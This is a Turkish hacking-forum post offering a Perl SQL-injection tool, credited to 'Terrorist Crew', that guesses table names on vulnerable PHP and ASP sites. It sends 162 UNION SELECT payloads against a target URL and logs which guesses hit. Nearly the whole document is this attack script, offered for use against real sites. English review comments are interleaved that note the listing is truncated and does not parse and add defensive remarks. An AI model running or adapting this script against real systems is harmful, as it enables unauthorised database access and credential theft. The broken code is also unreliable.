Selamun Aleykum Arkadaslar...
Son zamanların modası olan SQL'de size büyük bir kolaylık sağlayacak bir Perl exploiti vereceğim...
Örneğin bir sitede SQL injection hatası buldunuz, tablo adını tahmin edemiyorsunuz ya da uğraşmak istemiyorsunuz; bu exploit tam size göre... Fazla uzatmadan kodları vereyim...
Exploiti Perl'de çalıştırabilirsiniz... Konu hakkında sorusu olan konu altından belirtsin..
#!/usr/bin/perluse LWP::UserAgent;
use HTTP::Request;
# Interactive entry point: prints a banner and a two-item menu, then
# dispatches on the number stored in $opcao to one of the two subs below
# (1 -> PHP, 2 -> ASP). Any other value falls through and nothing runs.
# NOTE(review): the listing is damaged as shown - the right-hand side of the
# `$opcao=` assignment is missing, so this block does not parse. The file
# also has no `use strict` / `use warnings`, and $opcao is a package global.
print "#########################################################\n";
print "# [Terrorist Crew] #\n";
print "# Türkcelestirme By aRea~ TurkHarekatKuvvetleri #\n";
print "# Asp Ve Php Tablo scanner v1.0 #\n";
print "# www.turkharekat.com #\n";
print "# aRea #\n";
print "# Code Started... #\n";
print "#########################################################\n";
print "\n";
print "Menu:\n";
print "\n";
print "1. PHP SQL İNJ TABLO\n";
print "2. ASP SQL İNJ TABLO\n";
print "\n";
print "Opcao: ";
$opcao=
# Numeric comparison; the two branches are independent `if`s, not if/elsif.
if ($opcao==1)
{
# `&NAME` with no parentheses calls the sub with the caller's current @_.
&PHP
}
if ($opcao==2)
{
&ASP
}
# PHP: table-name guessing pass for a URL that already ends in a UNION
# SELECT payload (see the example string printed below).
# For each suffix in @tab it requests $site . suffix and records the URL when
# the response body contains neither "doesn't exist" nor
# "You have an error in your SQL syntax." - the database error text echoed by
# the target page is the only signal used.
# Takes no arguments and returns nothing useful; hits go to stdout and are
# appended to Union_PHP.txt. $site, @tab and $scan are package globals.
# NOTE(review): the `chomp($site =` line is truncated in this listing, so the
# sub does not parse as shown.
# Defensive notes: one run is 162 sequential GET requests against a single
# query parameter, each ending in `+from+<name>`, sent with whatever
# User-Agent LWP::UserAgent->new() defaults to (libwww-perl/<version>). That
# burst is straightforward to alert on in access logs or at a WAF. Binding the
# parameter in a prepared statement removes the injection point itself.
sub PHP
{
print "Sql Taranacak siteyi yazin:\n";
print "Ex: http://www.siteismi.com/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9\n\n";
chomp($site =
# Unanchored match: any input containing "http://" anywhere is left as-is;
# everything else (including https:// URLs) gets "http://" prepended.
if($site !~ /http:\/\//) { $site = "http://$site"; }
# Candidate suffixes, one request each (162 entries; a few names repeat).
@tab= ('+from+usuarios',
'+from+usuario',
'+from+users',
'+from+user',
'+from+login',
'+from+admin',
'+from+tbusuarios',
'+from+tbusuario',
'+from+tbusers',
'+from+tbuser',
'+from+tblogin',
'+from+tbadmin',
'+from+tblusuarios',
'+from+tblusuario',
'+from+tblusers',
'+from+tbluser',
'+from+tbllogin',
'+from+tbladmin',
'+from+tb_usuarios',
'+from+tb_usuario',
'+from+tb_users',
'+from+tb_user',
'+from+tb_login',
'+from+tb_admin',
'+from+tbl_usuarios',
'+from+tbl_usuario',
'+from+tbl_users',
'+from+tbl_user',
'+from+tbl_login',
'+from+tbl_admin',
'+from+tblUsers',
'+from+tblAdmin',
'+from+username',
'+from+usernames',
'+from+name',
'+from+names',
'+from+nombre',
'+from+nombres',
'+from+member',
'+from+members',
'+from+admin_table',
'+from+miembro',
'+from+miembros',
'+from+membername',
'+from+admins',
'+from+administrator',
'+from+administrators',
'+from+passwd',
'+from+password',
'+from+passwords',
'+from+pass',
'+from+Pass',
'+from+tAdmin',
'+from+tadmin',
'+from+user_password',
'+from+user_passwords',
'+from+user_name',
'+from+user_names',
'+from+member_password',
'+from+mods',
'+from+mod',
'+from+moderators',
'+from+moderator',
'+from+user_email',
'+from+user_emails',
'+from+user_mail',
'+from+user_mails',
'+from+mail',
'+from+emails',
'+from+email',
'+from+address',
'+from+e-mail',
'+from+emailaddress',
'+from+correo',
'+from+correos',
'+from+phpbb_users',
'+from+log',
'+from+logins',
'+from+login',
'+from+registers',
'+from+register',
'+from+usr',
'+from+usrs',
'+from+ps',
'+from+pw',
'+from+un',
'+from+u_name',
'+from+u_pass',
'+from+tpassword',
'+from+tPassword',
'+from+u_password',
'+from+nick',
'+from+nicks',
'+from+manager',
'+from+managers',
'+from+administrador',
'+from+tUser',
'+from+tUsers',
'+from+administradores',
'+from+clave',
'+from+login_id',
'+from+pwd',
'+from+pas',
'+from+sistema_id',
'+from+sistema_usuario',
'+from+sistema_password',
'+from+contrasena',
'+from+auth',
'+from+key',
'+from+senha',
'+from+tb_administrator',
'+from+tb_logon',
'+from+tb_members_tb_member',
'+from+tb_userstb_user',
'+from+tb_sys',
'+from+sys',
'+from+fazerlogon',
'+from+logon',
'+from+fazer',
'+from+uthorization',
'+from+membros',
'+from+utilizadores',
'+from+staff',
'+from+nuke_authors',
'+from+accounts',
'+from+account',
'+from+accnts',
'+from+associated',
'+from+accnt',
'+from+customers',
'+from+customer',
'+from+membres',
'+from+administrateur',
'+from+utilisateur',
'+from+tusertusers',
'+from+utilisateurs',
'+from+password',
'+from+amministratore',
'+from+god',
'+from+God',
'+from+authors',
'+from+asociado',
'+from+asociados',
'+from+autores',
'+from+membername',
'+from+autor',
'+from+autores',
'+from+Users',
'+from+Admin',
'+from+Members',
'+from+Miembros',
'+from+Usuario',
'+from+Usuarios',
'+from+ADMIN',
'+from+USERS',
'+from+USER',
'+from+MEMBER',
'+from+MEMBERS',
'+from+USUARIO',
'+from+USUARIOS',
'+from+MIEMBROS',
'+from+MIEMBRO');
# "\T" is not a recognised escape in a double-quoted string; Perl passes the
# "T" through, so the message still starts with "Tablolar".
print "\Tablolar araniyoooo... Bulunan tablolar asagida listelenecektir....\n\n";
foreach $scan(@tab){
my $url = $site.$scan;
# A fresh user agent is constructed on every iteration, with default settings.
my $ua = LWP::UserAgent->new();
my $req = HTTP::Request->new(GET=>$url);
my $resultado = $ua->request($req);
# A "hit" is the absence of both error strings, and the HTTP status is never
# checked. A page that never echoes these two database messages (generic
# error page, failed request, redirect) therefore makes every candidate look
# like a hit, so the output carries no information about the schema.
if ($resultado->content !~ /doesn't exist/ && $resultado->content !~ /You have an error in your SQL syntax./)
{
print "$url\n";
# Two-argument open on a bareword handle `a`, return value unchecked; the path
# is relative, so the file lands in the current working directory.
open(a, ">>Union_PHP.txt");
print a "$url\n";
close(a);
}}
# "\b" in a double-quoted string is a backspace character, so this line emits
# a backspace followed by "ulunan ..."; "\m" below is passed through as "m".
# The messages say the file was saved to the desktop, which the relative
# open() above does not guarantee.
print "\bulunan tablolar masaustune Union_PHP.txt olarak kaydedildi.\n";
print "\masaustunden ulasabilirsiniz bulunan tablolarin listelerine\n";
}
# ASP: same guessing loop as the PHP sub, but each suffix carries its own
# `+union+select+0+from+<name>` clause and the success test is inverted: a URL
# is recorded only when the response body contains the column-count-mismatch
# message checked below.
# Takes no arguments and returns nothing useful; hits go to stdout and are
# appended to Union_ASP.txt. $site, @tab and $scan are package globals.
# NOTE(review): the `chomp($site =` line is truncated in this listing, so the
# sub does not parse as shown.
# Defensive notes: one run is 162 sequential GET requests against a single
# query parameter, each containing `union+select+0+from+`, sent with whatever
# User-Agent LWP::UserAgent->new() defaults to (libwww-perl/<version>).
# Because a hit requires the database driver's own message in the page body,
# returning a generic error page to clients removes the signal this check
# relies on; binding the parameter in a prepared statement removes the
# injection point itself.
sub ASP
{
print "Sql Taranacak siteyi yazin:\n";
print "Ex: http://www.siteismi.com/default.asp?id=99\n\n";
chomp($site =
# Unanchored match: any input containing "http://" anywhere is left as-is;
# everything else (including https:// URLs) gets "http://" prepended.
if($site !~ /http:\/\//) { $site = "http://$site"; }
# Candidate suffixes, one request each (162 entries; a few names repeat).
@tab= ('+union+select+0+from+usuarios',
'+union+select+0+from+usuario',
'+union+select+0+from+users',
'+union+select+0+from+user',
'+union+select+0+from+login',
'+union+select+0+from+admin',
'+union+select+0+from+tbusuarios',
'+union+select+0+from+tbusuario',
'+union+select+0+from+tbusers',
'+union+select+0+from+tbuser',
'+union+select+0+from+tblogin',
'+union+select+0+from+tbadmin',
'+union+select+0+from+tblusuarios',
'+union+select+0+from+tblusuario',
'+union+select+0+from+tblusers',
'+union+select+0+from+tbluser',
'+union+select+0+from+tbllogin',
'+union+select+0+from+tbladmin',
'+union+select+0+from+tb_usuarios',
'+union+select+0+from+tb_usuario',
'+union+select+0+from+tb_users',
'+union+select+0+from+tb_user',
'+union+select+0+from+tb_login',
'+union+select+0+from+tb_admin',
'+union+select+0+from+tbl_usuarios',
'+union+select+0+from+tbl_usuario',
'+union+select+0+from+tbl_users',
'+union+select+0+from+tbl_user',
'+union+select+0+from+tbl_login',
'+union+select+0+from+tbl_admin',
'+union+select+0+from+tblUsers',
'+union+select+0+from+tblAdmin',
'+union+select+0+from+username',
'+union+select+0+from+usernames',
'+union+select+0+from+name',
'+union+select+0+from+names',
'+union+select+0+from+nombre',
'+union+select+0+from+nombres',
'+union+select+0+from+member',
'+union+select+0+from+members',
'+union+select+0+from+admin_table',
'+union+select+0+from+miembro',
'+union+select+0+from+miembros',
'+union+select+0+from+membername',
'+union+select+0+from+admins',
'+union+select+0+from+administrator',
'+union+select+0+from+administrators',
'+union+select+0+from+passwd',
'+union+select+0+from+password',
'+union+select+0+from+passwords',
'+union+select+0+from+pass',
'+union+select+0+from+Pass',
'+union+select+0+from+tAdmin',
'+union+select+0+from+tadmin',
'+union+select+0+from+user_password',
'+union+select+0+from+user_passwords',
'+union+select+0+from+user_name',
'+union+select+0+from+user_names',
'+union+select+0+from+member_password',
'+union+select+0+from+mods',
'+union+select+0+from+mod',
'+union+select+0+from+moderators',
'+union+select+0+from+moderator',
'+union+select+0+from+user_email',
'+union+select+0+from+user_emails',
'+union+select+0+from+user_mail',
'+union+select+0+from+user_mails',
'+union+select+0+from+mail',
'+union+select+0+from+emails',
'+union+select+0+from+email',
'+union+select+0+from+address',
'+union+select+0+from+e-mail',
'+union+select+0+from+emailaddress',
'+union+select+0+from+correo',
'+union+select+0+from+correos',
'+union+select+0+from+phpbb_users',
'+union+select+0+from+log',
'+union+select+0+from+logins',
'+union+select+0+from+login',
'+union+select+0+from+registers',
'+union+select+0+from+register',
'+union+select+0+from+usr',
'+union+select+0+from+usrs',
'+union+select+0+from+ps',
'+union+select+0+from+pw',
'+union+select+0+from+un',
'+union+select+0+from+u_name',
'+union+select+0+from+u_pass',
'+union+select+0+from+tpassword',
'+union+select+0+from+tPassword',
'+union+select+0+from+u_password',
'+union+select+0+from+nick',
'+union+select+0+from+nicks',
'+union+select+0+from+manager',
'+union+select+0+from+managers',
'+union+select+0+from+administrador',
'+union+select+0+from+tUser',
'+union+select+0+from+tUsers',
'+union+select+0+from+administradores',
'+union+select+0+from+clave',
'+union+select+0+from+login_id',
'+union+select+0+from+pwd',
'+union+select+0+from+pas',
'+union+select+0+from+sistema_id',
'+union+select+0+from+sistema_usuario',
'+union+select+0+from+sistema_password',
'+union+select+0+from+contrasena',
'+union+select+0+from+auth',
'+union+select+0+from+key',
'+union+select+0+from+senha',
'+union+select+0+from+tb_administrator',
'+union+select+0+from+tb_logon',
'+union+select+0+from+tb_members_tb_member',
'+union+select+0+from+tb_userstb_user',
'+union+select+0+from+tb_sys',
'+union+select+0+from+sys',
'+union+select+0+from+fazerlogon',
'+union+select+0+from+logon',
'+union+select+0+from+fazer',
'+union+select+0+from+uthorization',
'+union+select+0+from+membros',
'+union+select+0+from+utilizadores',
'+union+select+0+from+staff',
'+union+select+0+from+nuke_authors',
'+union+select+0+from+accounts',
'+union+select+0+from+account',
'+union+select+0+from+accnts',
'+union+select+0+from+associated',
'+union+select+0+from+accnt',
'+union+select+0+from+customers',
'+union+select+0+from+customer',
'+union+select+0+from+membres',
'+union+select+0+from+administrateur',
'+union+select+0+from+utilisateur',
'+union+select+0+from+tusertusers',
'+union+select+0+from+utilisateurs',
'+union+select+0+from+password',
'+union+select+0+from+amministratore',
'+union+select+0+from+god',
'+union+select+0+from+God',
'+union+select+0+from+authors',
'+union+select+0+from+asociado',
'+union+select+0+from+asociados',
'+union+select+0+from+autores',
'+union+select+0+from+membername',
'+union+select+0+from+autor',
'+union+select+0+from+autores',
'+union+select+0+from+Users',
'+union+select+0+from+Admin',
'+union+select+0+from+Members',
'+union+select+0+from+Miembros',
'+union+select+0+from+Usuario',
'+union+select+0+from+Usuarios',
'+union+select+0+from+ADMIN',
'+union+select+0+from+USERS',
'+union+select+0+from+USER',
'+union+select+0+from+MEMBER',
'+union+select+0+from+MEMBERS',
'+union+select+0+from+USUARIO',
'+union+select+0+from+USUARIOS',
'+union+select+0+from+MIEMBROS',
'+union+select+0+from+MIEMBRO');
# "\T" is not a recognised escape in a double-quoted string; Perl passes the
# "T" through, so the message still starts with "Tablolar".
print "\Tablolar Araniyoooo... Bulunan tablolar asagida listelenecektir....\n\n";
foreach $scan(@tab){
my $url = $site.$scan;
# A fresh user agent is constructed on every iteration, with default settings.
my $ua = LWP::UserAgent->new();
my $req = HTTP::Request->new(GET=>$url);
my $resultado = $ua->request($req);
# A hit requires this exact English error sentence in the response body; the
# trailing "." is an unescaped regex metacharacter and matches any character.
# The HTTP status is never checked.
# NOTE(review): presumably the database engine's own message - confirm which
# driver emits it. A localised or suppressed error page yields no hits.
if ($resultado->content =~ /The number of columns in the two selected tables or queries of a union query do not match./)
{
print "$url\n";
# Two-argument open on a bareword handle `a`, return value unchecked; the path
# is relative, so the file lands in the current working directory.
open(a, ">>Union_ASP.txt");
print a "$url\n";
close(a);
}}
# "\B" and "\m" are unrecognised escapes and are passed through as "B" and "m".
# The messages say the file was saved to the desktop, which the relative
# open() above does not guarantee.
print "\Bulunan tablolar masaustune Union_ASP.txt olarak kaydedildi.\n";
print "\masaustunden ulasabilirsiniz bulunan tablolarin listelerine\n";
}